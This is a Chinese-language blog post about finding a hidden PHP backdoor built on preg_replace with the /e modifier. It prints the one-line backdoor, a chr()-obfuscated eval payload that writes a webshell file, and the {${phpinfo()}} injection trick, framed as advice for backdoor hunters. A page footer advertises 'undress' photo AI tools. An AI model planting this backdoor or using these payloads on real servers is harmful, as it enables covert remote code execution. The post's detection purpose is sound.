php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码.
事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马,老是找不到,小黑的伎俩很高级,每次使用完毕总是把后门删掉,但是每次都能继续进来,总是找不到从哪进来的,这个着实让人蛋疼.
后来,终于在日志中发现一丝蛛丝马迹,通过我的分析,我发现一个IP总是很奇怪的POST数据到某个文件,然后一段时间后,此IP就访问一个莫名奇妙文件,名字很显眼明显不是正常系统文件,而是PHP后门,但是很快使用完毕后门就被删除了,哈哈,遇到小黑蛮细心的,然后通过分析发现,小黑的访问的文件发现代码:
@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");
如果你看到这个代码是不是有的也没什么问题,但是,这个就是小黑的掩藏的恶意代码和后门,隐蔽吧,基本上任何查杀软件都查杀不到.
preg_replace函数原型:
mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
特别说明:
/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误.
上面的代码是POST接受数据要测试,比较麻烦,如果换成GET获取数据的话。。。
举例,代码如下:echo preg_replace("/test/e",$_GET["h"],"jutst test");
如果我们提交?h=phpinfo(),phpinfo()将会被执行(使用/e修饰符,preg_replace会将 replacement 参数当作 PHP代码执行).
如果我们要POST的话,我们测试提交下面的代码会怎么样呢?代码如下:
h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr
(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr
(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr
(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr
//开源代码phprm.com
(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
密文对应的明文是如下代码:fputs(fopen(data/a.php,w),);
执行的结果是在/data/目录下生成一个一句话木马文件 a.php,这个就恐怖了吧,再来一个有难度的例子,代码如下:
function test($str)
{
}
echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("1")', $_GET["h"]);
提交 ?h=[php]phpinfo()[/php],phpinfo()会被执行吗?
肯定不会,因为经过正则匹配后,replacement 参数变为'test("phpinfo")',此时phpinfo仅是被当做一个字符串参数了.
有没有办法让它执行呢?当然有,在这里我们如果提交?h=[php]{${phpinfo()}}[/php],phpinfo()就会被执行,为什么呢?
在php中,双引号里面如果包含有变量,php解释器会将其替换为变量解释后的结果;单引号中的变量不会被处理.
注意:双引号中的函数不会被执行和替换.
在这里我们需要通过{${}}构造出了一个特殊的变量,'test("{${phpinfo()}}")',达到让函数被执行的效果.
(${phpinfo()}会被解释执行)。
可以先做如下测试:echo "{${phpinfo()}}"; phpinfo会被成功执行了,所以,各位查找后门的时候注意查找下,说了那么多,也了解了,以下我给的代码:
1 @preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");
看似很正常的代码,其实就是一个极度危险的代码,隐藏颇深啊.
本文地址:
转载随意,但请附上文章地址:-)

熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱門文章

熱工具

禪工作室 13.0.1
強大的PHP整合開發環境

DVWA
Damn Vulnerable Web App (DVWA) 是一個PHP/MySQL的Web應用程序,非常容易受到攻擊。它的主要目標是成為安全專業人員在合法環境中測試自己的技能和工具的輔助工具,幫助Web開發人員更好地理解保護網路應用程式的過程,並幫助教師/學生在課堂環境中教授/學習Web應用程式安全性。 DVWA的目標是透過簡單直接的介面練習一些最常見的Web漏洞,難度各不相同。請注意,該軟體中

mPDF
mPDF是一個PHP庫,可以從UTF-8編碼的HTML產生PDF檔案。原作者Ian Back編寫mPDF以從他的網站上「即時」輸出PDF文件,並處理不同的語言。與原始腳本如HTML2FPDF相比,它的速度較慢,並且在使用Unicode字體時產生的檔案較大,但支援CSS樣式等,並進行了大量增強。支援幾乎所有語言,包括RTL(阿拉伯語和希伯來語)和CJK(中日韓)。支援嵌套的區塊級元素(如P、DIV),

SublimeText3 英文版
推薦:為Win版本,支援程式碼提示!

SublimeText3漢化版
中文版,非常好用